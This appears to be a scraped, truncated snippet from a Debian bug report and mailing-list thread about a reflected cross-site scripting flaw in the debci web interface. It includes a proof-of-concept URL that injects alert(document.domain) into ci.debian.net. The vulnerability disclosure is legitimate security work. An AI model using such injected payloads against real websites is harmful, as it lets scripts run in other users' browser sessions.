On Wed, Jun 24, 2020 at 08:39:06AM +0200, Raphael Hertzog wrote:
> Hi,
>
> On Mon, 15 Jun 2020, Sebastien Delafond wrote:
> > See for instance the following URL:
> >
> >
> > https://ci.debian.net/user/debci/jobs?package=abc";>alert(document.domain)
>
> The issue is present in multiple paramet
Hi,
On Mon, 15 Jun 2020, Sebastien Delafond wrote:
> See for instance the following URL:
>
>
> https://ci.debian.net/user/debci/jobs?package=abc";>alert(document.domain)
The issue is present in multiple parameters and even in the URL itself:
XSS Param URL:
https://ci.debian.net/user/debci%3
Source: debci
Version: 2.12.2
Severity: normal
Tags: security
User: de...@kali.org
Usertags: origin-kali
See for instance the following URL:
https://ci.debian.net/user/debci/jobs?package=abc";>alert(document.domain)
Cheers,
--
Seb
-- System Information:
Debian Release: bullseye/sid
APT p
3 matches
Mail list logo